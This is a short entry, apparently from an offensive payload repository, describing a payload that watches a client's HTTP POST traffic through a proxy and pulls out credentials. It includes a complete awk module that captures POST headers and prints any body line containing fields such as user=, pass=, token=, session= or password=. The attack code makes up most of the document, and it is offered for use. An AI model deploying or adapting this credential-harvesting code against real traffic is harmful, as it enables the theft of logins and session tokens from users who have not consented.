Capturing Credentials Submitted via HTTP

This payload uses *inotifywait* and *DYNAMICPROXY* to monitor the HTTP POST data streams generated by a client and extract sensitive information using *awk*.

payloads/credentials/capturing-http-credentials/modules/login_request.awk

@@ -0,0 +1,30 @@
+BEGIN {
+    header_content = ""
+    login_patterns = "(sid=|uid=|user=|pass=|email=|login=|token=|session=|username=|password=)[^&]*"
+}
+
+/POST \// {
+    post_header = 1
+}
+
+post_header == 1 {
+    header_line = $0
+    if (header_line ~ /^[[:space:]]*$/) {
+        post_header = 0
+        post_body = 1
+        next
+    } else {
+        header_content = (header_content != "") ? header_content "\n" : header_content
+        header_content = header_content header_line
+    }
+}
+
+post_body == 1 {
+    body_line = $0
+    if (body_line ~ login_patterns) {
+        print header_content
+        print body_line
+    }
+    post_body = 0
+    header_content = ""
+}